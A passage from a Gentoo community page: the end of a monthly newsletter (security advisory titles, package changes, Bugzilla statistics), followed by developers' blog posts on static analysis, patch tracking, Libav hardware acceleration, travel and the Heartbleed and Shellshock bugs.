201409-03 net-misc/dhcpcd dhcpcd: Denial of service 518596
201409-02 net-analyzer/net-snmp Net-SNMP: Denial of Service 431752
201409-01 net-analyzer/wireshark Wireshark: Multiple vulnerabilities 519014

Package Removals/Additions


Package Developer Date
dev-python/amara dev-zero 07 Sep 2014
dev-python/Bcryptor pacho 07 Sep 2014
dev-python/Yamlog pacho 07 Sep 2014
app-crypt/opencdk pacho 07 Sep 2014
net-dialup/gnome-ppp pacho 07 Sep 2014
media-plugins/vdr-dxr3 pacho 07 Sep 2014
media-video/dxr3config pacho 07 Sep 2014
media-video/em8300-libraries pacho 07 Sep 2014
media-video/em8300-modules pacho 07 Sep 2014
net-misc/xsupplicant pacho 07 Sep 2014
www-apache/mod_lisp2 pacho 07 Sep 2014
dev-python/py-gnupg pacho 07 Sep 2014
media-sound/decibel-audio-player pacho 07 Sep 2014
sys-power/gtk-cpuspeedy pacho 07 Sep 2014
app-emulation/emul-linux-x86-glibc-errno-compat pacho 07 Sep 2014
sys-fs/chironfs pacho 07 Sep 2014
net-p2p/giftui pacho 07 Sep 2014
app-misc/discomatic pacho 07 Sep 2014
x11-misc/uf-view pacho 07 Sep 2014
games-action/minetest_build hasufell 09 Sep 2014
games-action/minetest_common hasufell 09 Sep 2014
games-action/minetest_survival hasufell 09 Sep 2014
www-client/opera-next jer 15 Sep 2014
www-apps/swish-e dilfridge 19 Sep 2014
dev-qt/qcustomplot jlec 29 Sep 2014


Package Developer Date
dev-ruby/typhoeus graaff 01 Sep 2014
dev-python/toolz patrick 02 Sep 2014
dev-python/cytoolz patrick 02 Sep 2014
dev-python/unicodecsv patrick 02 Sep 2014
dev-python/characteristic idella4 02 Sep 2014
dev-python/service_identity idella4 02 Sep 2014
dev-libs/gom pacho 02 Sep 2014
games-roguelike/mazesofmonad hasufell 02 Sep 2014
dev-ruby/ast mrueg 04 Sep 2014
dev-ruby/cliver mrueg 04 Sep 2014
dev-ruby/parser mrueg 04 Sep 2014
dev-ruby/astrolabe mrueg 04 Sep 2014
net-ftp/pybootd vapier 04 Sep 2014
net-analyzer/nbwmon jer 04 Sep 2014
net-misc/megatools dlan 05 Sep 2014
dev-python/placefinder idella4 06 Sep 2014
dev-python/flask-cors idella4 09 Sep 2014
app-crypt/crackpkcs12 vapier 10 Sep 2014
dev-qt/linguist-tools pesa 11 Sep 2014
dev-qt/qdbus pesa 11 Sep 2014
dev-qt/qdoc pesa 11 Sep 2014
dev-qt/qtconcurrent pesa 11 Sep 2014
dev-qt/qtdiag pesa 11 Sep 2014
dev-qt/qtgraphicaleffects pesa 11 Sep 2014
dev-qt/qtimageformats pesa 11 Sep 2014
dev-qt/qtnetwork pesa 11 Sep 2014
dev-qt/qtpaths pesa 11 Sep 2014
dev-qt/qtprintsupport pesa 11 Sep 2014
dev-qt/qtquick1 pesa 11 Sep 2014
dev-qt/qtquickcontrols pesa 11 Sep 2014
dev-qt/qtserialport pesa 11 Sep 2014
dev-qt/qttranslations pesa 11 Sep 2014
dev-qt/qtwebsockets pesa 11 Sep 2014
dev-qt/qtwidgets pesa 11 Sep 2014
dev-qt/qtx11extras pesa 11 Sep 2014
dev-qt/qtxml pesa 11 Sep 2014
www-client/otter jer 13 Sep 2014
dev-util/pycharm-community xmw 14 Sep 2014
dev-util/pycharm-professional xmw 14 Sep 2014
media-libs/libgltf dilfridge 14 Sep 2014
www-client/opera-beta jer 15 Sep 2014
dev-libs/libbase58 blueness 15 Sep 2014
net-libs/courier-unicode hanno 16 Sep 2014
dev-libs/bareos-fastlzlib mschiff 16 Sep 2014
sys-libs/nss-usrfiles ryao 17 Sep 2014
sys-cluster/poolmon mschiff 18 Sep 2014
dev-python/pyClamd xmw 20 Sep 2014
sci-libs/htslib jlec 20 Sep 2014
dev-python/pika xarthisius 21 Sep 2014
games-rpg/wasteland2 hasufell 21 Sep 2014
app-backup/holland-lib-common alunduil 21 Sep 2014
app-backup/holland-backup-sqlite alunduil 21 Sep 2014
app-backup/holland-backup-pgdump alunduil 21 Sep 2014
app-backup/holland-backup-example alunduil 21 Sep 2014
app-backup/holland-backup-random alunduil 21 Sep 2014
app-backup/holland-lib-lvm alunduil 21 Sep 2014
app-backup/holland-lib-mysql alunduil 21 Sep 2014
app-backup/holland-backup-mysqldump alunduil 21 Sep 2014
app-backup/holland-backup-mysqlhotcopy alunduil 21 Sep 2014
app-backup/holland-backup-mysql-lvm alunduil 21 Sep 2014
app-backup/holland-backup-mysql-meta alunduil 21 Sep 2014
app-backup/holland alunduil 21 Sep 2014
net-libs/libndp pacho 22 Sep 2014
dev-python/keystonemiddleware prometheanfire 22 Sep 2014
media-libs/libbdplus beandog 22 Sep 2014
dev-python/texttable alunduil 23 Sep 2014
dev-perl/IMAP-BodyStructure chainsaw 25 Sep 2014
net-libs/uhttpmock pacho 25 Sep 2014
dev-perl/Data-Validate-IP chainsaw 25 Sep 2014
dev-perl/Data-Validate-Domain chainsaw 25 Sep 2014
dev-perl/Template-Plugin-Cycle chainsaw 25 Sep 2014
dev-perl/XML-Directory chainsaw 25 Sep 2014
dev-python/treq ryao 25 Sep 2014
dev-python/eliot ryao 25 Sep 2014
dev-python/xcffib idella4 26 Sep 2014
dev-qt/qtsensors pesa 26 Sep 2014
dev-python/path-py floppym 27 Sep 2014
dev-perl/Archive-Extract dilfridge 27 Sep 2014
dev-python/requests-mock alunduil 27 Sep 2014
dev-libs/appstream-glib eva 27 Sep 2014
dev-qt/qtpositioning pesa 28 Sep 2014
dev-qt/qcustomplot jlec 28 Sep 2014
dev-perl/Data-Structure-Util dilfridge 28 Sep 2014
dev-perl/IO-Event dilfridge 28 Sep 2014
dev-libs/qcustomplot jlec 29 Sep 2014
dev-python/webassets yngwin 30 Sep 2014
dev-python/google-apputils idella4 30 Sep 2014
dev-python/pyinsane voyageur 30 Sep 2014
dev-python/pyocr voyageur 30 Sep 2014
app-text/paperwork voyageur 30 Sep 2014


The Gentoo community uses Bugzilla to record and track bugs, notifications, suggestions and other interactions with the development team.


The following tables and charts summarize the activity on Bugzilla between 01 September 2014 and 01 October 2014. Not fixed means bugs that were resolved as NEEDINFO, WONTFIX, CANTFIX, INVALID or UPSTREAM.

Bug Activity Number
New 1196
Closed 769
Not fixed 175
Duplicates 136
Total 6132
Blocker 5
Critical 17
Major 66

Closed bug ranking

The following table outlines the teams and developers with the most bugs resolved during this period

Rank Team/Developer Bug Count
1 Gentoo Security 49
2 Gentoo Linux Gnome Desktop Team 38
3 Python Gentoo Team 21
4 Qt Bug Alias 20
5 Perl Devs @ Gentoo 20
6 Gentoo KDE team 20
7 Portage team 19
8 Gentoo Games 17
9 Netmon Herd 16
10 Others 548


Assigned bug ranking

The developers and teams who have been assigned the most bugs during this period are as follows.

Rank Team/Developer Bug Count
1 Gentoo Linux bug wranglers 92
2 Gentoo Security 62
3 Gentoo Linux Gnome Desktop Team 59
4 Gentoo's Team for Core System packages 39
5 Gentoo Games 37
6 Portage team 33
7 Python Gentoo Team 32
8 Gentoo KDE team 32
9 Perl Devs @ Gentoo 27
10 Others 782



Tip of the month

(thanks to Thomas D. for the link to the blog post)

In case you like messing with your kernel Kconfig options to tweak the kernel image for your Gentoo boxes, you may want to know that menuconfig accepts regular expressions for searching symbols. You can start the search by typing ‘/’. For example, if you want to find all symbols ending with PCI do something like this after pressing ‘/’.


You get a bunch of results, and then you can press the number listed on the left to jump directly to that symbol.

Related references:

Heard in the community

Send us your favorite Gentoo script or tip at

Getting Involved?

Interested in helping out? The GMN relies on volunteers and members of the community for content every month. If you are interested in writing for the GMN or thinking of another way to contribute, please send an e-mail to

Comments or Suggestions?

Please head over to this forum post.

October 19, 2014
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

Here's a small piece of advice for all who want to upgrade their Perl to the very newest available, but still keep running an otherwise stable Gentoo installation: These three lines are exactly what needs to go into /etc/portage/package.keywords:
Of course, as always, bugs may be present; what you get as Perl installation is called unstable or testing for a reason. We're looking forward to your reports on our bugzilla.

Sven Vermeulen a.k.a. swift (homepage, bugs)
Lots of new challenges ahead (October 19, 2014, 14:01 UTC)

I’ve been pretty busy lately, albeit behind the corners, which leads to a lower activity within the free software communities that I’m active in. Still, I’m not planning any exit, on the contrary. Lots of ideas are just waiting for some free time to engage. So what are the challenges that have been taking up my time?

One of them is that I recently moved. And with moving comes a lot of work in getting the place into a good shape and getting settled. Today I finished the last job that I wanted to finish in my appartment in a short amount of time, so that’s one thing off my TODO list.

Another one is that I started an intensive master-after-master programme with the subject of Enterprise Architecture. This not only takes up quite some ex-cathedra time, but also additional hours of studying (and for the moment also exams). But I’m really satisfied that I can take up this course, as I’ve been wandering around in the world of enterprise architecture for some time now and want to grow even further in this field.

But that’s not all. One of my side activities has been blooming a lot, and I recently reached the 200th server that I’m administering (although I think this number will reduce to about 120 as I’m helping one organization with handing over management of their 80+ systems to their own IT staff). Together with some friends (who also have non-profit customers’ IT infrastructure management as their side-business) we’re now looking at consolidating our approach to system administration (and engineering).

I’m also looking at investing time and resources in a start-up, depending on the business plan and required efforts. But more information on this later when things are more clear :-)

October 18, 2014
Luca Barbato a.k.a. lu_zero (homepage, bugs)
Fix ALL the BUGS! (October 18, 2014, 12:12 UTC)

Vittorio started (with some help from me) to fix all the issues pointed by Coverity.

Static analysis

Coverity (and scan-build) are quite useful to spot mistakes even if their false-positive ratio tend to be quite high. Even the false-positives are usually interesting since the spot code unnecessarily convoluted. The code should be as simple as possible but not simpler.

The basic idea behind those tools is to try to follow the code-paths while compiling them and spot what could go wrong (e.g. you are feeding a NULL to a function that would deference it).

The problems with this approach are usually two: false positive due to the limited scope of the analyzer and false negatives due shadowing.

False Positives

Coverity might assume certain inputs are valid even if they are made impossible by some initial checks up in the codeflow.

In those case you should spend enough time to make sure Coverity is not right and those faulty inputs aren’t slipping somewhere. NEVER try to just add some checks to the code pointed as first move, you might either hide issues (e.g. if Coverity complains about uninitialized variable do not just initialize it to nothing, check why it happens and if the logic behind is wrong).

If Coverity is confused, your compiler is confused as well and will produce suboptimal executables. Properly fixing those issues can result in useful speedups. Simpler code is usually faster.

Ever increasing issue count

While fixing issues using those tools you might notice to your surprise that every time you fix something, something new appears out of thin air.

This is not magic but simply that the static analyzers usually keep some limit on how deep they go depending on the issues already present and how much time had been spent already.

That surprise had been fun since apparently some of the time limit is per compilation unit so splitting large files in smaller chunks gets us more results (while speeding up the building process thanks to better parallelism).

Usually fixing some high-impact issue gets us 3 or 5 new small impact issues.

I like solving puzzles so I do not mind having more fun, sadly I did not have much spare time to play this game lately.

Merge ALL the FIXES

Fixing properly all the issues is a lofty goal and as usual having a patch is just 1/2 of the work. Usually two set of eyes work better than one and an additional brain with different expertise can prevent a good chunk of mistakes. The review process is the other, sometimes neglected, half of solving issues.

So far about 100+ patches got piled up over the past weeks and now they are sent in small batches to ease the work of review. (I have something brewing to make reviewing simpler, as you might know)

During the review what probably about 1/10 of the patches will be rejected and the relative coverity report updated with enough information to explain why it is a false positive or the dangerous or strange behaviour pointed is intentional.

The next point release for our 4 maintained major releases: 0.8, 9, 10 and 11. Many thanks to the volunteers that spend their free time keeping all the branches up to date!

Tracking patches (October 18, 2014, 11:53 UTC)

You need good tools to do a good job.

Even the best tool in the hand of a novice is a club.

I’m quite fond in improving the tools I use. And that’s why I started getting involved in Gentoo, Libav, VLC and plenty of other projects.

I already discussed about lldb and asan/valgrind, now my current focus is about patch trackers. In part it is due to the current effort to improve the libav one,


Before talking about patches and their tracking I’d digress a little on who produces them. The mythical Contributor: without contributions an opensource project would not exist.

You might have recurring contributions and unique/seldom contributions. Both are quite important.
In general you should make so seldom contributors become recurring contributors.

A recurring contributor can accept to spend some additional time to setup the environment to actually provide its contribution back to the community, a sporadic contributor could be easily put off if the effort required to send his patch is larger than writing the patch itself.

Th project maintainers should make so the life of contributors is as simple as possible.

Patches and Revision Control

Lately most opensource projects saw the light and started to use decentralized source revision control system and thanks to github and many other is the concept of issue pull requests is getting part of our culture and with it comes hopefully a wider acceptance to the fact that the code should be reviewed before it is merged.

Pull Request

In a decentralized development scenario new code is usually developed in topic branches, routinely rebased against the master until the set is ready and then the set of changes (called series or patchset) is reviewed and after some round of fixes eventually merged. Thanks to bitbucket now we have forking, spooning and knifing as part of the jargon.

The review (and merge) step, quite properly, is called knifing (or stabbing): you have to dice, slice and polish the code before merging it.

Reviewing code

During a review bugs are usually spotted as well way to improve are suggested. Patches might be split or merged together and the series reworked and improved a lot.

The process is usually time consuming, even more for an organization made of volunteer: writing code is fun, address issues spotted is not so much, review someone else code is much less even.

Sadly it is a necessary annoyance since otherwise the errors (and horrors) that would slip through would be much bigger and probably much more. If you do not care about code quality and what you are writing is not used by other people you can probably ignore that, if you feel somehow concerned that what you wrote might turn some people life in a sea of pain. (On the other hand some gratitude for such daunting effort is usually welcome).

Pull request management

The old fashioned way to issue a pull request is either poke somebody telling that your branch is ready for merge or just make a set of patches and mail them to whoever is in charge of integrating code to the main branch.

git provides a nifty tool to do that called git send-email and is quite common to send sets of patches (called usually series) to a mailing list. You get feedback by email and you can update the set using the --in-reply-to option and the message id.

Platforms such as github and similar are more web centric and require you to use the web interface to issue and review the request. No additional tools are required beside your git and a browser.

gerrit and reviewboard provide custom scripts to setup ephemeral branches in some staging area then the review process requires a browser again. Every commit gets some tool-specific metadata to ease tracking changes across series revisions. This approach the more setup intensive.

Pro and cons

Mailing list approach

Testing patches from the mailing list is quite simple thanks to git am. And if the reply-to field is used properly updates appear sorted in a good way.

This method is the simplest for the people used to have the email client always open and a console (if they are using a well configured emacs or vim they literally do not move away from the editor).

On the other hand, people using a webmail or using a basic email client might find the approach more cumbersome than a web based one.

If your only method to track contribution is just a mailing list, gets quite easy to forget which is the status of a set. Patches could be neglected and even who wrote them might forget for a long time.

Patchwork approach

Patchwork tracks which patches hit a mailing list and tries to figure out if they are eventually merged automatically.

It is quite basic: it provides an web interface to check the status and provides a mean to just update the patch status. The review must happen in the mailing list and there is no concept of series.

As basic as it is works as a reminder about pending patches but tends to get cluttered easily and keeping it clean requires some effort.

Github approach

The web interface makes much easier spot what is pending and what’s its status, people used to have everything in the browser (chrome and mozilla could be made to work as a decent IDE lately) might like it much better.

Reviewing small series or single patches is usually nicer but the current UIs do not scale for larger (5+) patchsets.

People not living in a browser find quite annoying switch context and it requires additional effort to contribute since you have to register to a website and the process of issuing a patch requires many additional steps while in the email approach just require to type git send-email -1.

Gerrit approach

The gerrit interfaces tend to be richer than the Github counterparts. That can be good or bad since they aren’t as immediate and tend to overwhelm new contributors.

You need to make an additional effort to setup your environment since you need some custom script.

The series are tracked with additional precision, but for all the practical usage is the same as github with the additional bourden for the contributor.

Introducing plaid

Plaid is my attempt to tackle the problem. It is currently unfinished and in dire need of more hands working on it.

It’s basic concept is to be non-intrusive as much as possible, retaining all the pros of the simple git+email workflow like patchwork does.

It provides already additional features such as the ability to manage series of patches and to track updates to it. It sports a view to get a break out of which series require a review and which are pending for a long time waiting for an update.

What’s pending is adding the ability to review it directly in the browser, send the review email for the web to the mailing list and a some more.

Probably I might complete it within the year or next spring, if you like Flask or python contributions are warmly welcome!

October 17, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
My ideal editor (October 17, 2014, 19:03 UTC)

Notepad Art
Photo credit: Stephen Dann

Some of you probably read me ranting on G+ and Twitter about blog post editors. I have been complaining about that since at least last year when Typo decided to start eating my drafts. After that almost meltdown I decided to look for alternatives on writing blog posts, first with Evernote – until they decided to reset everybody's password and required you to type some content from one of your notes to be able to get the new one – and then with Google Docs.

I have indeed kept using Google Docs until recently, when it started having some issues with dead keys. Because I have been using US International layout for years, and I'm too used to it when I write English too. If I am to use a non-deadkeys keyboard, I end up adding spaces where they shouldn't be. So even if it solves it by just switching the layout, I wouldn't want to write a long text with it that way.

Then I decided to give another try to Evernote, especially as the Samsung Galaxy Note 10.1 I bought last year came with a yet-to-activate 12 months subscription to the Pro version. Not that I find anything extremely useful in it, but…

It all worked well for a while until they decided to throw me into the new Beta editor, which follows all the newest trends in blog editors. Yes because there are trends in editors now! Away goes the full-width editing, instead you have a limited-width editing space in a mostly-white canvas with disappearing interface, like node.js's Ghost and Medium and now Publify (the new name of what used to be Typo).

And here's my problem: while I understand that they try to make things that look neat and that supposedly are there to help you "focus on writing" they miss the point quite a bit with me. Indeed, rather than having a fancy editor, I think Typo needs a better drafting mechanism that does not puke on itself when you start playing with dates and other similar details.

And Evernote's new editor is not much better; indeed last week, while I was in Paris, I decided to take half an afternoon to write about libtool – mostly because J-B has been facing some issues and I wanted to document the root causes I encountered – and after two hours of heavy writing, I got to Evernote, and the note is gone. Indeed it asked me to log back in. And I logged in that same morning.

When I complained about that on Twitter, the amount of snark and backward thinking I got surprised me. I was expecting some trolling, but I had people seriously suggesting me that you should not edit things online. What? In 2014? You've got to be kidding me.

But just to make that clear, yes I have used offline editing for a while back, as Typo's editor has been overly sensible to changes too many times. But it does not scale. I'm not always on the same device, not only I have three computers in my own apartment, but I have two more at work, and then I have tablets. It is not uncommon for me to start writing on a post on one laptop, then switch to the other – for instance because I need access to the smartcard reader to read some data – or to start writing a blog post while at a conference with my work laptop, and then finish it in my room on the personal one, and so on so forth.

Yes I could use Dropbox for out-of-band synchronization, but its handling of conflicts is not great, if you end up having one of the devices offline by mistake — better than the effets of it on password syncs but not so much better. Indeed I have bad experiences with that, because it makes it too easy to start working on something completely offline, and then forget to resync it before editing it from a different service.

Other suggestions included (again) the use of statically generated blogs. I have said before that I don't care for them and I don't want to hear them as suggestions. First they suffer from the same problems stated above with working offline, and secondly they don't really support comments as first class citizens: they require services such as Disqus, Google+ or Facebook to store the comments, including it in the page as an external iframe. I not only don't like the idea of farming out the comments to a different service in general, but I would be losing too many features: search within the blog, fine-grained control over commenting (all my blog posts are open to comment, but it's filtered down with my ModSecurity rules), and I'm not even sure they would allow me to import the current set of comments.

I wonder why, instead of playing with all the CSS and JavaScript to make the interface disappear, the editors' developers don't invest time to make the drafts bulletproof. Client-side offline storage should allow for preserving data even in case of being logged out or losing network connection. I know it's not easy (or I would be writing it myself) but it shouldn't be impossible, either. Right now it seems the bling is what everybody wants to work on, rather than functionality — it probably is easier to put in your portfolio, and that could be a good explanation as any.

October 15, 2014
Sebastian Pipping a.k.a. sping (homepage, bugs)

I ran into this documentary today…

October 14, 2014
Jan Kundrát a.k.a. jkt (homepage, bugs)

Some of the recent releases of Trojitá, a fast Qt e-mail client, mentioned an ongoing work towards bringing the application to the Ubuntu Touch platform. It turns out that this won't be happening.

The developers who were working on the Ubuntu Touch UI decided that they would prefer to end working with upstream and instead focus on a standalone long-term fork of Trojitá called Dekko. The fork lives within the Launchpad ecosystem and we agreed that there's no point in keeping unmaintained and dead code in our repository anymore -- hence it's being removed.

Alexys Jacob a.k.a. ultrabug (homepage, bugs)
One month in Turkey (October 14, 2014, 20:35 UTC)

Our latest roadtrip was as amazing as it was challenging because we decided that we’d spend an entire month in Turkey and use our own motorbike to get there from Paris.


Our main idea was to spare ourselves from the long hours of road riding to Turkey so we decided from the start to use ferries to get there. Turns out that it’s pretty easy as you have to go through Italy and Greece before you set foot in Bodrum, Turkey.

  • Paris -> Nice : train
  • Nice -> Parma (IT) -> Ancona : road, (~7h drive)
  • Ancona -> Patras (GR) : ferry (21h)
  • Patras -> Piraeus (Athens) : road (~4h drive, constructions)
  • Piraeus -> Kos : ferry (~11h by night)
  • Kos -> Bodrum (TR) : ferry (1h)

Turkish customs are very friendly and polite, it’s really easy to get in with your own vehicle.

Tribute to the Nightster

This roadtrip added 6000 kms to our brave and astonishing Harley-Davidson Nightster. We encountered no problem at all with the bike even though we clearly didn’t go easy on her. We rode on gravels, dirt and mud without her complaining, not to mention the weight of our luggages and the passengers ;)

That’s why this post will be dedicated to our bike and I’ll share some of the photos I took of it during the trip. The real photos will come in some other posts.

A quick photo tour

I can’t describe well enough the pleasure and freedom feeling you get when travelling in motorbike so I hope those first photos will give you an idea.

I have to admit that it’s really impressive to leave your bike alone between the numerous trucks parking, loading/unloading their stuff a few centimeters from it.

























We arrived in Piraeus easily, time to buy tickets for the next boat to Kos.

IMG_20140906_164101  IMG_20140906_191845







Kos is quite a big island that you can discover best by … riding around !


After Bodrum, where we only spent the night, you quickly discover the true nature of Turkish roads and scenery. Animals are everywhere and sometimes on the road such as those donkeys below.









This is a view from the Bozburun bay. Two photos for two bike layouts : beach version and fully loaded version ;)

IMG_20140909_191337 IMG_20140910_112858








On the way to Cappadocia, near Karapinar :

























The amazing landscapes of Cappadocia, after two weeks by the sea it felt cold up there.

IMG_20140920_140433 IMG_20140920_174936 IMG_20140921_130308








Our last picture from the bike next to the trail leading to our favorite and lonely “private” beach on the Datça peninsula.














October 13, 2014
Raúl Porcel a.k.a. armin76 (homepage, bugs)
S390 documentation in the Gentoo Wiki (October 13, 2014, 08:44 UTC)

Hi all,

One of the projects I had last year that I ended up suspending due to lack of time was S390 documentation and installation materials. For some reason there wasn’t any materials available to install Gentoo on a S390 system without having to rely in an already installed distribution.

Thanks to Marist College, IBM and Linux Foundation we were able to get two VMs for building the release materials, and thanks to Dave Jones @ V/Soft Software I was able to document the installation in a z/VM environment. Also thanks to the Debian project, since I based the materials in their procedure.

So most of the part of last year and the last few weeks I’ve been polishing and finishing the documentation I had around. So what I’ve documented: Gentoo S390 on the Hercules emulator and Gentoo S390 on z/VM. Both are based in the same pattern, since

Gentoo S390 on the Hercules emulator

This is probably the guide that will be more interesting because everyone can run the Hercules emulator, while not everyone has access to a z/VM instance. Hercules emulates an S390 system, it’s like QEMU. However QEMU, from what I can tell, is unable to emulate an S390 system in a non-S390 system, while Hercules does.

So if you want to have some fun and emulate a S390 machine in your computer, and install and use Gentoo in it, then follow the guide:

Gentoo S390 on z/VM

For those that have access to z/VM and want to install Gentoo, the guide explains all the steps needed to get a Gentoo System working. Thanks to Dave Jones I was able to create the guide and test the release materials, he even did a presentation in the 2013 VM Workshop! Link to the PDF . Keep in mind that some of the instructions given there are now outdated, mainly the links.

The link to the documentation is:

I have also written some tips and tricks for z/VM: They’re really basic and were the ones I needed for creating the guide.

Installation materials

Lastly, we already had the autobuilds stage3 for s390, but we lacked the boot environment for installing Gentoo. This boot environment/release material is simply a kernel and a initramfs built with Gentoo’s genkernel based in busybox. It builds an environment using busybox like the livecd in amd64/x86 or other architectures. I’ve integrated the build of these boot environment with the autobuilds, so each week there should be an updated installation environment.

Have fun!

October 11, 2014
Luca Barbato a.k.a. lu_zero (homepage, bugs)
VDD14 Discussions: HWAccel2 (October 11, 2014, 14:47 UTC)

I took part to the Videolan Dev Days 14 weeks ago, sadly I had been too busy so the posts about it will appear in scattered order and sort of delayed.

Hardware acceleration

In multimedia, video is basically crunching numbers and get pixels or crunching pixels and getting numbers. Most of the operation are quite time consuming on a general purpose CPU and orders of magnitude faster if done using DSP or hardware designed for that purpose.


Most of the commonly used system have video decoding and encoding capabilities either embedded in the GPU or in separated hardware. Leveraging it spares lots of cpu cycles and lots of battery if we are thinking about mobile.


The usually specialized hardware has the issue of being inflexible and that does clash with the fact most codec evolve quite quickly with additional profiles to extend its capabilities, support different color spaces, use additional encoding strategies and such. Software decoders and encoders are still needed and need badly.

Hardware acceleration support in Libav

HWAccel 1

The hardware acceleration support in Libav grew (like other eldritch-horror tentacular code we have lurking from our dark past) without much direction addressing short term problems and not really documenting how to use it.

As result all the people that dared to use it had to guess, usually used internal symbols that they wouldn’t have to use and all in all had to spend lots of time and
had enough grief when such internals changed.


Every backend required a quite large deal of boilerplate code to initialize the backend-specific context and to render the hardware surface wrapped in the AVFrame.

The Libav backend interface was quite vague in itself, requiring to override get_format and get_buffer in some ways.

Overall to get the whole thing working the library user was supposed to do about 75% of the work. Not really nice considering people uses libraries to abstract complexity and avoid repetition

Backend support

As that support was written with just slice-based decoder in mind, it expects that all the backend would require the software decoder to parse the bitstream, prepare slices of the frame and feed the backend with them.

Sadly new backends appeared and they take directly either bitstream or full frames, the approach had been just to take the slice, add back the bitstream markers the backend library expects and be done with that.

Initial HWAccel 2 discussion

Last year since the number of backends I wanted to support were all bitstream-oriented and not fitting the mode at all I started thinking about it and the topic got discussed a bit during VDD 13. Some people that spent their dear time getting hwaccel1 working with their software were quite wary of radical changes so a path of incremental improvements got more or less put down.

HWAccel 1.2

  • default functions to allocate and free the backend context and make the struct to interface between Libav and the backend extensible without causing breakage.
  • avconv now can use some hwaccel, providing at least an example on how to use them and a mean to test without having to gut VLC or mpv to experiment.
  • document better the old-style hwaccels so at least some mistakes could be avoided (and some code that happen to work by sheer look won’t break once the faulty assuptions cease to exist)

The new VDA backend and the update VDPAU backend are examples of it.

HWAccel 1.3

  • extend the callback system to fit decently bitstream oriented backends.
  • provide an example of backend directly providing normal AVFrames.

The Intel QSV backend is used as a testbed for hwaccel 1.3.

The future of HWAccel2

Another year, another meeting. We sat down again to figure out how to get further closer to the end result of not having the casual users write boilerplate code to use hwaccel to get at least some performance boost and yet let the power users have the full access to the underpinnings so they can get most of it without having to write everything from scratch.

Simplified usage, hopefully really simple

The user just needs to use AVOption to set specific keys such as hwaccel and optionally hwaccel-device and the library will take care of everything. The frames returned by avcodec_decode_video2 will contain normal system memory and commonly used pixel formats. No further special code will be needed.

Advanced usage, now properly abstracted

All the default initialization, memory/surface allocation and such will remain overridable, with the difference that an additional callback called get_hw_surface will be introduced to separate completely the hwaccel path from the software path and specific functions to hand over the ownership of backend contexts and surfaces will be provided.

The software fallback won’t be anymore automagic in this case, but a specific AVERROR_INPUT_CHANGED will be returned so would be cleaner for the user reset the decoder without losing the display that maybe was sharing the same context. This leads the way to a simpler mean to support multiple hwaccel backends and fall back from one to the other to eventually the software decoding.

Migration path

We try our best to help people move to the new APIs.

Moving from HWAccel1 to HWAccel2 in general would result in less lines of code in the application, the people wanting to keep their callback need to just set them after avcodec_open2 and move the pixel specific get_buffer to get_hw_surface. The presence of av_hwaccel_hand_over_frame and av_hwaccel_hand_over_context will make much simpler managing the backend specific resources.

Expected Time of Arrival

Right now the review is on the HWaccel1.3, I hope to complete this step and add few new backends to test how good/bad that API is before adding the other steps. Probably HWAccel2 will take at least other 6 months.

Help in form of code or just moral support is always welcome!

Mike Pagano a.k.a. mpagano (homepage, bugs)
Netflix on Gentoo (October 11, 2014, 13:11 UTC)

Contrary to some articles you may read on the internet, NetFlix is working great on Gentoo.

Here’s a snap shot of my system running 3.12.30-gentoo sources and google chrome version 39.0.2171.19_p1.



$ equery l google-chrome-beta
* Searching for google-chrome-beta …
[IP-] [ ] www-client/google-chrome-beta-39.0.2171.19_p1:0



October 08, 2014
Alexys Jacob a.k.a. ultrabug (homepage, bugs)
py3status v1.6 (October 08, 2014, 09:01 UTC)

Back from holidays, this new version of py3status was due for a long time now as it features a lot of great contributions !

This version is dedicated to the amazing @ShadowPrince who contributed 6 new modules :)


  • core : rename the ‘examples’ folder to ‘modules’
  • core : Fix include_paths default wrt issue #38, by Frank Haun
  • new vnstat module, by Vasiliy Horbachenko
  • new net_rate module, alternative module for tracking network rate, by Vasiliy Horbachenko
  • new scratchpad-counter module and window-title module for displaying current windows title, by Vasiliy Horbachenko
  • new keyboard-layout module, by Vasiliy Horbachenko
  • new mpd_status module, by Vasiliy Horbachenko
  • new clementine module displaying the current “artist – title” playing in Clementine, by François LASSERRE
  • module Make python3 compatible, by Frank Haun
  • add optional CPU temperature to the sysdata module, by Rayeshman


Huge thanks to this release’s contributors :

  • @ChoiZ
  • @fhaun
  • @rayeshman
  • @ShadowPrince

What’s next ?

The next 1.7 release of py3status will bring a neat and cool feature which I’m sure you’ll love, stay tuned !

October 07, 2014
Sebastian Pipping a.k.a. sping (homepage, bugs)
Two types of respect mixed up by Linus Torvalds (October 07, 2014, 19:59 UTC)

I recently ran into the Q&A with Linus Torvalds @ Debconf 2014 video.

During the session, Torvalds is being criticized for lack of respect and replies that ~”respect is to be earned”. Technically, he confuses respect as in admiration with respect as in dignity. Simplified, he is saying that human dignity does not matter to him. Linus, I’m fairly disappointed.

October 06, 2014
Hanno Böck a.k.a. hanno (homepage, bugs)
How to stop Bleeding Hearts and Shocking Shells (October 06, 2014, 21:35 UTC)

Heartbleed logoThe free software community was recently shattered by two security bugs called Heartbleed and Shellshock. While technically these bugs where quite different I think they still share a lot.

Heartbleed hit the news in April this year. A bug in OpenSSL that allowed to extract privat keys of encrypted connections. When a bug in Bash called Shellshock hit the news I was first hesistant to call it bigger than Heartbleed. But now I am pretty sure it is. While Heartbleed was big there were some things that alleviated the impact. It took some days till people found out how to practically extract private keys - and it still wasn't fast. And the most likely attack scenario - stealing a private key and pulling off a Man-in-the-Middle-attack - seemed something that'd still pose some difficulties to an attacker. It seemed that people who update their systems quickly (like me) weren't in any real danger.

Shellshock was different. It's astonishingly simple to use and real attacks started hours after it became public. If circumstances had been unfortunate there would've been a very real chance that my own servers could've been hit by it. I usually feel the IT stuff under my responsibility is pretty safe, so things like this scare me.

What OpenSSL and Bash have in common

Shortly after Heartbleed something became very obvious: The OpenSSL project wasn't in good shape. The software that pretty much everyone in the Internet uses to do encryption was run by a small number of underpaid people. People trying to contribute and submit patches were often ignored (I know that, I tried it). The truth about Bash looks even grimmer: It's a project mostly run by a single volunteer. And yet almost every large Internet company out there uses it. Apple installs it on every laptop. OpenSSL and Bash are crucial pieces of software and run on the majority of the servers that run the Internet. Yet they are very small projects backed by few people. Besides they are both quite old, you'll find tons of legacy code in them written more than a decade ago.

People like to rant about the code quality of software like OpenSSL and Bash. However I am not that concerned about these two projects. This is the upside of events like these: OpenSSL is probably much securer than it ever was and after the dust settles Bash will be a better piece of software. If you want to ask yourself where the next Heartbleed/Shellshock-alike bug will happen, ask this: What projects are there that are installed on almost every Linux system out there? And how many of them have a healthy community and received a good security audit lately?

